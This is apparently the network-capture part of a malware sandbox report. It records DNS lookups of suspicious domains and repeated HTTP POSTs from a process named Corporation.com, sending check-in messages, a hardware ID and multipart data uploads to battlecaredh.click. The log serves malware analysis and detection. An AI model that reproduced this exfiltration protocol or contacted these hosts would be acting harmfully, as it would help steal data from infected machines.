                                                                                                                                                  Dec 29, 2024 16:37:24.317985058 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.318022966 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.322603941 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322618961 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322691917 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.322710037 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322762012 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.328649998 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328664064 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328730106 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.328747034 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328783035 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.334587097 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334599972 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334660053 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.334676981 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334714890 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.336426973 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336483002 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.336494923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336513042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336550951 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345491886 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345515966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.345554113 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345561028 CET44349750104.21.37.128192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 29, 2024 16:36:31.881633043 CET | 57058 | 53 | 192.168.2.4 | 1.1.1.1
Dec 29, 2024 16:36:32.134953022 CET | 53 | 57058 | 1.1.1.1 | 192.168.2.4
Dec 29, 2024 16:36:42.197626114 CET | 62041 | 53 | 192.168.2.4 | 1.1.1.1
Dec 29, 2024 16:36:42.565474987 CET | 53 | 62041 | 1.1.1.1 | 192.168.2.4
Dec 29, 2024 16:37:05.188755989 CET | 63322 | 53 | 192.168.2.4 | 1.1.1.1
Dec 29, 2024 16:37:06.145196915 CET | 53 | 63322 | 1.1.1.1 | 192.168.2.4
Dec 29, 2024 16:37:08.133548021 CET | 64090 | 53 | 192.168.2.4 | 1.1.1.1
Dec 29, 2024 16:37:08.482040882 CET | 53 | 64090 | 1.1.1.1 | 192.168.2.4
Dec 29, 2024 16:37:08.707575083 CET | 52328 | 53 | 192.168.2.4 | 1.1.1.1
Dec 29, 2024 16:37:08.940474987 CET | 53 | 52328 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 29, 2024 16:36:31.881633043 CET | 192.168.2.4 | 1.1.1.1 | 0x987b | Standard query (0) | ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.197626114 CET | 192.168.2.4 | 1.1.1.1 | 0xb6a7 | Standard query (0) | battlecaredh.click | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:05.188755989 CET | 192.168.2.4 | 1.1.1.1 | 0xd8e6 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:08.133548021 CET | 192.168.2.4 | 1.1.1.1 | 0x11be | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:08.707575083 CET | 192.168.2.4 | 1.1.1.1 | 0x240c | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 29, 2024 16:36:32.134953022 CET | 1.1.1.1 | 192.168.2.4 | 0x987b | Name error (3) | ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK | none | none | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:36:42.565474987 CET | 1.1.1.1 | 192.168.2.4 | 0xb6a7 | No error (0) | battlecaredh.click | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:06.145196915 CET | 1.1.1.1 | 192.168.2.4 | 0xd8e6 | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:08.482040882 CET | 1.1.1.1 | 192.168.2.4 | 0x11be | No error (0) | klipvumisui.shop | | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:08.482040882 CET | 1.1.1.1 | 192.168.2.4 | 0x11be | No error (0) | klipvumisui.shop | | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:37:08.940474987 CET | 1.1.1.1 | 192.168.2.4 | 0x240c | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                  • battlecaredh.click
                                                                                                                                                  • cegu.shop
                                                                                                                                                  • klipvumisui.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:43 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:43 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-29 15:36:44 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:44 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=05faokdj4prt8rvfku7udij84s; expires=Thu, 24 Apr 2025 09:23:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZIEYDvsh190lS6JBGoL3J3C4a3ih4jLLWBWBig8NbTp%2Flzl5bUZjM6KIkdVP57Tesf1%2BIQFjbm3Xcs3yUUZvtbyHq3%2BZJApZr58a%2B%2BOnmfDOQRAbvc4acjDBIVWhu7EB3V9iP%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade0bfaad72b9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=909&delivery_rate=135511&cwnd=214&unsent_bytes=0&cid=b5bf421f60d309aa&ts=764&x=0"
2024-12-29 15:36:44 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-29 15:36:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:45 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 78
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:45 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2024-12-29 15:36:46 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:46 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=pqrdtoqr786p9vlhqief9n4e62; expires=Thu, 24 Apr 2025 09:23:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xhzhm3%2BkjRYsyXLmsAOEz4eSQHK%2BGpdx7%2FkaGwJI2fwH5id%2FSE%2Fi3MXh05P%2BzFi6hNGnG4lsRMcFNBCCeL97jtJ%2FeWdVRUpGScKCmWPS340gaxpw4jCFnBlQ5E3POeXD%2FHGhKxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade18df631875-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1628&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=980&delivery_rate=1793611&cwnd=153&unsent_bytes=0&cid=64b340a14ae23ed5&ts=796&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:48 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=N9FVVOM0QP3
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 18120
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:48 UTC | 15331 | OUT | Data Ascii:
--N9FVVOM0QP3
Content-Disposition: form-data; name="hwid"

14654DF6EAF0FCE6BC510B35BBB55F9A
--N9FVVOM0QP3
Content-Disposition: form-data; name="pid"

2
--N9FVVOM0QP3
Content-Disposition: form-data; name="lid"

hRjzG3--TRON
--N9FVVOM0QP3
Conte
2024-12-29 15:36:48 UTC | 2789 | OUT | Data Raw: binary data
2024-12-29 15:36:49 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:49 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=h6k8musq4vhkbon9r9grkivg3h; expires=Thu, 24 Apr 2025 09:23:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTdRvHVvSXllVVABWMCy9xVWNllT%2Fecn2mT86Oeg2f8EMdPt0boSGBl%2FN0AqM1XJIgmSlSZWO35zD62NbDHuuWZtCoBqVr%2BQNL%2BwqeijIJup6i7KiUTaGI0ZlRCHFOYA9AL9Ksc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade274c261875-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1618&rtt_var=621&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19077&delivery_rate=1804697&cwnd=153&unsent_bytes=0&cid=ad19493b93869491&ts=1035&x=0"
2024-12-29 15:36:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-29 15:36:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:50 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=UVVWAL0WYLLDG9K
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8765
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:50 UTC | 8765 | OUT | Data Ascii:
--UVVWAL0WYLLDG9K
Content-Disposition: form-data; name="hwid"

14654DF6EAF0FCE6BC510B35BBB55F9A
--UVVWAL0WYLLDG9K
Content-Disposition: form-data; name="pid"

2
--UVVWAL0WYLLDG9K
Content-Disposition: form-data; name="lid"

hRjzG3--TRON
--UVVWAL
2024-12-29 15:36:51 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:51 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=cucvp0mr79223v20d1vo0205la; expires=Thu, 24 Apr 2025 09:23:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cGMrCbocgBvjr%2FoQQCF7GwRi2ppC6yrhK9ofgzKyh%2BmCbchbEkH%2BbIbYnWLHxTA2doDcZXXNOei%2BXeaPYItIs8RJHEQokGCJgeI22urty8sGuZX%2BkBXDALFuBNSooXCaTW%2BA%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade36387241a6-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1553&rtt_var=716&sent=9&recv=15&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9703&delivery_rate=1399137&cwnd=239&unsent_bytes=0&cid=dab8854cf82394a6&ts=790&x=0"
2024-12-29 15:36:51 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-29 15:36:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:52 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=HOYDKW4DI
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 20382
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:52 UTC | 15331 | OUT | Data Ascii: --HOYDKW4DIContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--HOYDKW4DIContent-Disposition: form-data; name="pid"3--HOYDKW4DIContent-Disposition: form-data; name="lid"hRjzG3--TRON--HOYDKW4DIContent-Dispo
2024-12-29 15:36:54 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:53 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=1koe95n2h3vv5mhfkgih9l83f0; expires=Thu, 24 Apr 2025 09:23:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBm7mu1NXn%2FJomAkPBkGq5%2BwIvF0zalk09suzytm1ReCWplMnVRQXNXKjeOtQ8ssbUUAUU%2FuvmEz09dNNznL5Qw%2B1PZVln3CLlsOdHBMAZLC4bvtnquMTRLQoLb0Y5TfIb%2BqVl8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade431a224344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1666&rtt_var=651&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21337&delivery_rate=1752701&cwnd=47&unsent_bytes=0&cid=41d459b910b47cf9&ts=1308&x=0"
2024-12-29 15:36:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-29 15:36:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:55 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=36H0OO2IVOZ52O767
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 7123
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:55 UTC | 7123 | OUT | Data Ascii: --36H0OO2IVOZ52O767Content-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--36H0OO2IVOZ52O767Content-Disposition: form-data; name="pid"1--36H0OO2IVOZ52O767Content-Disposition: form-data; name="lid"hRjzG3--TRON--
2024-12-29 15:36:56 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:56 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=0tu547ej1g2idvrfh2ps2heh60; expires=Thu, 24 Apr 2025 09:23:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uLLYl9%2FexAB0bs4rDeEITx%2BTORHnz9Y4grotf%2Btbw1TbVlyjXdI%2BmINmwKSoVLGrHYxgLDBreqv5OjWYlNazwieu027agBDgkgyZFEGPsS6XI1W5wDzFPOXv8LmvDqPnoG02%2BXo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade545a784344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1666&rtt_var=626&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=8041&delivery_rate=1752701&cwnd=47&unsent_bytes=0&cid=31b43b9c75c35c01&ts=776&x=0"
2024-12-29 15:36:56 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-29 15:36:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:36:57 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=6NSHD4N7A9IN
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 1222
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:36:57 UTC | 1222 | OUT | Data Ascii: --6NSHD4N7A9INContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--6NSHD4N7A9INContent-Disposition: form-data; name="pid"1--6NSHD4N7A9INContent-Disposition: form-data; name="lid"hRjzG3--TRON--6NSHD4N7A9INC
2024-12-29 15:36:58 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=bsk7vu242hsh8stdiofi3fjdf9; expires=Thu, 24 Apr 2025 09:23:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbDEL4fZGqDHOClBVcVDrTh53m%2FvrCCB3teUuYfan5l6RkQCO51cr5XGkELXC5yapeaCaR0YJT%2B3xSWHgaShmRp%2FN9vPpCpHjSg2t3kGhUbQ5UNfDVFhHrMt27HWU9Evo1xr7B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade61c8c44344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1618&rtt_var=624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=2135&delivery_rate=1730883&cwnd=47&unsent_bytes=0&cid=fbab05c0657cd85e&ts=822&x=0"
2024-12-29 15:36:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-29 15:36:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49747 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:37:00 UTC | 276 | OUT | POST /api HTTP/1.1
